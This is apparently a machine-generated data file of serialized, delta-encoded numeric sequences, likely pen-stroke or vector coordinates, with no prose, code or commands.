6092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26 140,'42'-25'6529,"-43"26"-6084,0 0 1,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0-1,1 1 1,-1-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,0 2-1,-2 38 1575,2-36-1979,0 1 0,1-1 1,0 1-1,0-1 0,0 0 1,1 1-1,0-1 0,0 0 1,1 0-1,0 0 0,4 7 0,16 25 256,-20-33-263,-1 1 0,1-1 0,0 0 0,0-1 0,0 1 0,1-1 0,6 8 0,31 43 192,-39-48-212,6 1-239,-9-8 135,-4-3-25,-6-39-5229,9 6-801,2 18 2824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37 344,'0'0'2417,"2"-18"4610,6 15-5775,-16-3 630,-13-3 963,19 9-2296,-22 5 163,-3 10-254,20-12-381,0 0 1,0 0-1,1 1 1,-1 0-1,1 1 1,0-1-1,0 1 1,1 1-1,-1-1 1,1 1-1,-7 10 1,7-5-87,1 0 1,1 0-1,0 1 1,1-1 0,0 1-1,1 0 1,0 0-1,0-1 1,3 18-1,-2-15 68,0-11-40,0-1-1,1 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1-1,0-1 1,0 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,2 0 1,2 2 20,0 0 0,0-1 0,1 0 0,-1 0-1,12 3 1,-8-4-63,0 0 0,0-1-1,0 0 1,0-1 0,0 0-1,0-1 1,0 0-1,0 0 1,-1-1 0,1 0-1,0-1 1,-1 0 0,1-1-1,9-4 1,38-27-3440,-14-8-5614,-30 26 5565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1 820,'0'0'6096,"9"7"952,-9-7-6948,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,-1-1 0,1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 1,1-1-1,-1 0 0,0 1 1,1-1-1,0 1 0,0 2-31,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,2 6 1,8 34 344,1 47 131,-12-51-440,0-19-43,1 0 0,1 0 0,0 0 0,8 36 0,-7-44-37,0-1 1,-1 0-1,-1 1 1,0-1 0,-2 18-1,1 8 20,12 4 18,-11-31-21,0-8-26,0 1 0,1-1-1,-1 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 1-1,-3 11 97,5-13-109,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,0 1 1,0-1-1,-1 0 0,1 1 1,0-1-1,-1 0 1,1 1-1,0-1 1,0 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 0,1-1-3,0 0-1,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 0 0,-1 1 0,-5 10-558,3 7-938,-7-24-1604,9 5 2825,1-1 1,0 1 0,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,1 0-1,-1 0 1,0-1 0,1 1-1,0 0 1,0-2-1,1-1-520,-1 0 0,1 1 1,-1-1-1,0 0 0,0 0 0,-1 0 0,1 0 0,-1-8 0,0 0-1385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20,'-9'0'8856,"8"0"-8746,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,-1 1 0,-29 18 1881,15 4-661,15-24-1273,-5 5 118,1-1 1,0 1-1,0 0 0,1 1 0,0-1 1,-4 8-1,-35 21 635,41-33-757,-21 19 375,22-21-416,-2 12 91,-4-9-108,4-1 5,0-1-1,1 1 1,-1 0 0,1-1 0,-1 1-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,-1 3 0,-5 3 32,6-7-16,1 1 1,-1-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,-1 1 1,1 0-1,0-1 0,-1 1 1,1 0-1,0 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0-1 0,1 1 1,-1 1-1,1 0-16,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0 0,1 0-1,1 0 1,14 14 19,9 18-9,19-2-21,-45-30 9,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,1-1-1,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 1,2 0-1,-1-1 8,0 1 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0-1,-1 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,11 27-31,-7-26 6,-4-3 20,1 0-1,-1 0 0,0 1 1,1-1-1,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 0,-1 1 1,0-1-1,0 0 0,1 0 1,-1 0-1,0 0 0,0 1 1,1-1-1,-1 0 0,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,7-1-108,-12 0-248,3 0-348,-29-24-11152,30 18 8538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2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88 164 364,'0'0'2120,"-13"-1"4834,9 3-6942,4-2 145,0 0-1,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 1,1 0-1,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 1,0 1-1,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 1,0 2 949,54-7 287,-40 1-1220,0 0-36,0 0 0,0-1 1,18-9-1,-23 13-108,4-5 24,4-5-4,-16 10-42,1 1 0,-1-1 0,1 0 1,-1 1-1,0-1 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0-1 0,-1 1 0,1-1 1,0-1-1,10-15 61,0-6-57,-11 22-9,-1 1 1,1-1-1,0 1 0,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 0,1-1 1,-1 1-1,0 0 0,0 0 1,0 0-1,0 0 0,-1-2 1,1 2 5,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 1,1 0-1,0-1 0,-1-1 0,1 2 2,-1 1-1,1-1 1,0 0 0,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 0 1,1 1 0,-1-1-1,0 1 1,1-1 0,-1 1-1,0 0 1,1-1 0,-1 1-1,0 0 1,0-1 0,1 1-1,-1 0 1,0 0 0,0 0-1,1-1 1,-1 1 0,-1 0-1,-26-2 142,10 7-154,0 1-1,-28 12 0,26-7 41,13-8-32,1 1 1,-1 0-1,1 0 0,0 0 0,0 1 1,0 0-1,-9 11 0,1-5 13,12-9-13,0-1-1,-1 0 1,2 1 0,-1-1-1,0 1 1,0-1 0,0 1-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-2 4 0,-5 13-57,6-17 51,1 0 0,-1-1 0,1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 1-1,1-1 1,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,1-1 0,1 4 0,19 49 330,-18-51-295,0 1 1,0-1-1,0 0 0,0 0 1,1 0-1,0 0 0,0 0 1,0-1-1,0 0 0,0 1 1,1-2-1,0 1 0,-1 0 1,1-1-1,0 0 1,9 2-1,4 0-200,0-2-1,0 0 1,36-2 0,-34 0-188,27-5-3614,1-14-5920,-37 13 6770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5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85 20,'0'-13'5717,"22"-35"-4103,-15 40-868,-5 6-32,-9 5-281,5-2-90,8-8 655,-3 3-96,-10-2-597,5 5 213,4 1-160,-4 0-150,11 17 2395,-10-16-2598,0 0 1,0 0-1,0 0 0,0 0 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 1 1,1-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 0,1 1 1,-1 9 65,-11 18 196,11 48 279,-11-49-507,1 39 29,10 28-37,-6-88-25,3-4 2,10 2-1,-7-5 4,0-1-1,1 1 1,-1-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1-1-1,1 1 1,0-1 0,0 1 0,-1-1-1,1 1 1,0-1 0,-1 1-1,1-1 1,0 0 0,-1 1 0,1-1-1,-1 1 1,1-1 0,-5 8-286,5-7 244,0 41 204,0-44-364,0 6 446,0-2 122,0-10-199,0 7-193,0 0-9,0-1 22,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,-2-2 0,2 3 2,1 0 1,-1-1 0,1 1 0,0 0-1,-1-1 1,1 1 0,-1 0-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,0-1 0,-1 1-1,1-1 1,0 1 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0-2 0,3-2 2,-1 0 0,1-1 0,-1 1 1,0-1-1,0 1 0,-1-1 0,1 0 1,-1 0-1,0 0 0,-1 0 0,1 0 0,-1 0 1,0-7-1,11-25-1,-11 34-5,0 0 1,1 0-1,0 0 0,-1 0 0,1 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 1 0,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,2-2-1,13-18 30,17-27 9,-34 48-40,2-1 2,0 0 0,-1-1 0,1 1-1,0 0 1,0 0 0,0 0 0,0 0-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1 0 0,3-1-1,-4 2-1,-1 0 3,-1-1 1,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,1 0-1,-1-1 1,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,32-7 72,-1 8-96,-29 0 5,-1 0-12,7 0 33,-7 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,0-1-1,0 1 1,1-1 0,-1 1 0,0 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 2-1,0-1-11,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 0 0,-2 2-1,-2 17-889,5-20 793,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0 0,1-1-1,0 1 1,0 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 1,-1 1-1,1 0 1,-1-1-1,1 1 1,-1-1-1,1 1 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1 0,1 1-1,-1-1 1,0 0-1,0 1 1,1-1-1,-1 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,-30 14-8856,21-8 5810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16,'0'0'640,"-22"10"353,22-10-991,0-1 1,0 1 0,0 0-1,0 0 1,0-1-1,0 1 1,-1 0 0,1 0-1,0 0 1,0 0-1,0-1 1,0 1 0,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0 0,1 0-1,0-1 1,0 1-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 1-1,0-1 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0-1,0 0 1,0 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 1-1,0-1 1,0 0-1,0 0 1,0 1-1,0 0 3,-11 6-12,11-2 1664,-7-13 3561,4 5-4564,11 2-211,-6 1-225,-22-5 876,34 3 740,-11 3 253,-9-1-1714,4 0-39,2 3-182,0-3-147,0 1 1,0-1-1,-1 0 0,1 1 1,0-1-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,1 1-1,-1-1 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,1 0 1,-1 0-1,0 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,0 0-1,1 0 0,0 0 1,3-17-18,68-1 143,-71 17-128,1 0 1,0 1-1,0-1 0,0 1 0,0-1 1,-1 1-1,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 1,0 0-1,-1 1 0,1 0 0,0-1 0,0 1 1,-1 0-1,3 1 0,24 6 0,26-8 539,-41 2-596,-13-2 35,1 0 0,-1 1 0,1-1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1-1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1-1 0,-1 1-1,1 0 1,-1 0 0,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,1-1-1,6-5 152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38 636,'3'-7'737,"14"8"11414,-16-1-12026,33-6 2011,29-6-924,-21 6-1007,-41 6-190,2-1-25,-1 0-1,0 0 1,1 0 0,-1 0 0,1 0 0,-1 1-1,1-1 1,-1 1 0,1 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,1 1 0,2 0 0,2 1 67,-4-1-1026,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,5-2 0,3-3-1889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36 728,'22'-8'6011,"-20"7"-5574,0 0 1,0-1-1,1 1 0,-1 0 1,1 0-1,-1 0 0,1 1 0,-1-1 1,1 1-1,-1-1 0,4 1 0,55-12 2263,-57 11-2633,4-1-135,0 1 1,0 0-1,0 1 1,1 0-1,-1 0 1,0 1-1,12 2 1,-12-2-877,1 0 1,-1 0-1,1-1 1,-1 0-1,11-1 0,6 0-4468,-5 1 2665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22 996,'0'0'4565,"34"-11"3199,-26 8-7362,1 1 1,0 0-1,0 0 1,1 1-1,-1 0 1,0 1-1,0 0 1,16 2 0,5 0-444,-25-2 37,0 1 0,-1-1 0,1 2 1,0-1-1,-1 0 0,1 1 0,4 2 0,13 5-2665,2-5-7232,-15-4 6783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1 528,'63'6'10135,"-61"-6"-9664,41 0 1576,85 18-4073,-114-25-4487,-5 2 3723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11 828,'6'-1'1175,"-6"1"-1025,1 0 1,-1 0-1,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 0,1 1 0,-1-1 1,1 0-1,-1 0 0,1 0 0,-1 1 0,1-1 1,-1 0-1,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 1,-1 0-1,0 1 0,1-1 0,-1 0 0,0 2 0,3-2 243,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1-1 0,3-1 0,-4 2-226,32-5 2366,-29 3-2335,0 1 0,0 0 0,0 1 1,0-1-1,1 1 0,-1 0 1,0 0-1,0 0 0,1 0 1,6 3-1,7 0-134,0-1 1,32 0 0,-14 0-1039,-31-1-227,0 0 1,0-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,6-1 0,0 1-1691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22 760,'0'2'8889,"0"-3"-9188,0 0 819,12-5 3897,12 7-3671,-12-1-632,0 0 0,0 0 0,1-1-1,20-4 1,-19 2-286,1 1 1,-1 0-1,1 1 1,22 2-1,-15-1-1952,-14-3-189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37 164,'0'0'8454,"21"6"-3995,11-7-2300,-16-3-1896,0 1 0,0 1 0,0 0 0,0 1 0,23 2 0,-21 0-244,-16 0-369,0 0 1,0-1-1,0 1 0,-1-1 1,1 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,0-1 1,1 1-1,-1 0 1,0-1-1,0 0 0,2-1 1,-2-10-3057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0 628,'0'0'1730,"-7"6"1567,8-7-3320,4 3 4238,4 0 2731,-5-2-3814,4 23-3289,-7-17 157,0 0-1,1 0 0,-2 0 1,1 0-1,-1 0 0,0 0 0,0 0 1,-2 11-1,0 9 67,2-18-37,0 0-1,-1 0 0,0 0 0,-1 0 1,-3 10-1,3-11-13,1 1 0,-1-1 0,1 1 0,1-1 0,-1 1 0,1-1 0,2 10 0,-2-10-47,1 0 1,-1 0-1,0 0 0,-1 1 1,0-1-1,0 0 0,-2 7 0,-3 27 16,7-37 16,-1 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,0 0 1,-2 6-1,-8 45-4,0-6 16,0-1-20,1-7-4,7-34 13,0-1 0,1 0-1,0 1 1,1 0 0,-1-1 0,1 1 0,1 0 0,-1 0 0,1 0 0,0 0-1,2 7 1,-2 13 63,0-26-24,-12 5-398,10-6-32,1 0 1,0-1-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 1 0,0-1 1,0 0-1,1 0 1,-1 0-1,1-1 1,-1 1-1,1 0 1,-1 0-1,1 0 0,0 0 1,-1-2-1,-2-5-2501,-6-4-942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92 520,'0'-3'783,"1"1"0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,0 1 0,0-1 0,3-3 0,6-7 1563,-1 7-2149,0 0 0,0 1 1,1 0-1,-1 1 0,1 0 1,0 1-1,0 0 0,0 1 0,13-1 1,-11 1-173,29 3 4,-35 0-32,-1 1-1,1 0 1,-1 0-1,0 1 1,1 0-1,-2 0 1,1 0-1,0 1 1,-1 0-1,1 0 1,-1 1-1,0-1 1,0 1-1,-1 0 1,6 7-1,0 25 46,-8-32-34,-1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1-2 1,-4 7-1,-18 27 638,9-23-347,0-1 0,0 0 0,-2-1 0,0 0-1,0-2 1,-22 13 0,32-20-272,0 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 1,0 0-1,0-1 0,-1 0 0,1 0 0,-10-1 0,-15-7-4610,1-11-4134,20 7 5390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31 904,'2'6'17043,"-4"-6"-16772,7-6 416,-5 6-661,0 0 0,1-1 0,-1 1-1,0 0 1,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,0-1 0,1 1 0,-1 0 0,0-1-1,0 1 1,0 0 0,1-1 0,-1 1 0,0 0-1,0-1 1,0 1 0,0 0 0,1-1 0,-1 1-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,0-1-1,0 0 1,4-5 317,-4 6-315,1-1 0,-1 1-1,1-1 1,-1 1 0,1-1 0,-1 1-1,1-1 1,-1 1 0,0-1-1,1 1 1,-1-1 0,0 0-1,0 1 1,1-1 0,-1 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0-1 0,0 184 1026,-10-120-1032,-1 21-27,0 4 91,11-75-52,1-10-35,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-2 2 0,2-3 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,1 2 0,3 10 60,-16 29-156,11-41 152,0 0-95,0-9 105,0 3-12,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0-1,0 0 1,1 0 0,2-8 0,-3 12-52,0-1 0,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,1-1 0,-1 0-1,-1 1 1,1-1-1,0 1 1,0-2-1,1-16 24,74-135-2,-71 150-24,-1-1 1,1 1-1,0 0 1,1 0-1,-1 1 1,0-1-1,1 1 0,0 0 1,9-4-1,-10 5 2,-1 0 0,1 1-1,-1 0 1,1 0 0,-1 0-1,1 0 1,0 0-1,-1 1 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 1 1,-1 0-1,1-1 1,5 3 0,17 2-80,8-7 1,-30 1 80,0 0 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,6 6 0,-7-5-4,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,0 1-1,0-1 0,-1 1 1,1-1-1,-1 1 0,0 3 1,-10 51-174,9-52 195,0 0 1,0-1-1,0 1 0,-1 0 1,0-1-1,0 1 1,-1-1-1,1 0 1,-1 0-1,0 0 1,-7 9-1,-1 16 15,-10 0 9,12-16-60,-4 2-47,2-14-1784,17-15-2857,19-17-6762,-14 23 7915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1192,'6'0'14015,"-3"0"-14460,-1 47 2623,-2-39-2062,0 0 0,0-1 0,-1 1 0,0-1 0,-1 1 0,-3 9 0,-6 37 238,10-49-346,0 1 1,0-1-1,0 1 0,1 0 1,0-1-1,0 1 1,1 11-1,1 6-154,-2-22 121,0-1 1,1 1-1,-1-1 0,0 0 1,1 1-1,-1-1 0,1 0 1,-1 1-1,1-1 0,-1 0 1,0 1-1,1-1 0,-1 0 1,1 0-1,-1 0 0,1 1 1,0-1-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 1,1 0-1,-1 0 0,0-1 1,1 1-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1-1 1,0 1-1,1-1 0,-1 1 1,0 0-1,1-2 0,9-23-3972,-8 23 3453,-1 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1-3-1,1-11-2619,7 2 129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1 140,'-1'-1'322,"0"1"0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 1,0 0-1,1 1 0,-1-1 0,0 0 1,0 1-1,0-1 0,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,1-1 0,-1 1 1,1 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,1 0-1,-1 0 0,1 1 0,2 5-376,15 5-8545,-7-11 5733,0 4-4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2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13 1232,'-4'-2'536,"1"0"0,-1 1 0,0-1 0,1 1 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,-5 2 0,-34 15 2341,39-15-2682,-34 21 901,37-23-1080,-1 0 0,0 0 0,1 1 1,-1-1-1,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 1,-1 4-1,0-4-11,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-2 3 0,2-4-6,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 4 0,1 7-13,-1-8 19,1 1 0,0-1-1,0 1 1,0-1-1,0 0 1,1 1-1,0-1 1,0 0-1,1 1 1,-1-1 0,1 0-1,0 0 1,1 0-1,-1 0 1,6 6-1,4 8 16,8 6-28,20 22 5,-17-17-13,-11-5 12,-12-24 23,-1 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1-1,-1 0 1,1 1 0,0-1-1,0 0 1,-3 0 0,-36 6 123,31-5-143,-30 7 7,16-3-41,-1-1 0,-41 2 1,18-3-1028,8 0-3731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12 780,'-9'-12'5340,"10"13"-5053,0-1 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1 0 1,1-1 0,0 1-1,-1 0 1,1 0-1,-1-1 1,1 1-1,-1 0 1,0 0 0,1 0-1,-1 0 1,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 1 1,-1 14-108,1 3 115,1-8-206,-1 0 0,0 1-1,-1-1 1,-1 0 0,1 0 0,-5 12-1,-8 68 166,-15 35-66,25-106-181,0 1-1,2-1 1,0 0 0,2 35 0,0-39 172,-11 43-41,11-58-94,-18 18 535,16-17-538,0-1-1,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 1 0,-1 4 1,9-7 59,-11 0-45,4 0 585,1 1-620,0 3-5,0-3 39,2-3-41,0 1 14,0-1-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1-1 0,0 1-1,0-1 1,0 1-1,0-1 1,1-2-1,7-14 82,1 0 4,-1 0-1,9-30 1,-14 35-113,1 0 0,1 0 0,0 0 0,1 1 0,1 0 0,16-23 0,-20 32-1,1-1-1,-1 1 1,1 0 0,1 0 0,-1 0-1,0 1 1,1 0 0,-1 0-1,1 0 1,0 1 0,0 0 0,0 0-1,1 1 1,-1-1 0,0 1 0,0 0-1,8 1 1,-12 0-5,0 1 0,1-1-1,-1 1 1,1-1 0,-1 1 0,0 0-1,0 0 1,1 0 0,-1 1 0,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0-1,1 2 1,8 30 4,-1 16 30,-20 29 68,-1-20-132,0 3 88,14-47-49,-3-15-6,0 0 1,0 0 0,1 1-1,-1-1 1,0 0 0,0 0 0,0 0-1,0 1 1,0-1 0,1 0-1,-1 0 1,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,-1-1-1,1 0 1,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 1 0,0-1-1,0 0 1,-1 0 0,1 0-1,-1 0-110,1 0 0,-1 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,1 0 0,-1 0 0,0-1-1,1 1 1,-1 0 0,1-1 0,-1 1 0,1-1-1,-1 1 1,1-1 0,-1 1 0,1-1 0,-1 1-1,1-1 1,0 1 0,-1-1 0,1 0 0,0 1-1,-1-1 1,1 1 0,0-1 0,0 0 0,0 1-1,0-1 1,-1 0 0,1 1 0,0-1 0,0 0-1,0 1 1,0-1 0,1 0 0,-1 0 0,0 1-1,0-2 1,9-32-7315,-8 29 6473,1-14-2597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13 372,'-1'0'98,"1"0"-1,0-1 1,0 1-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 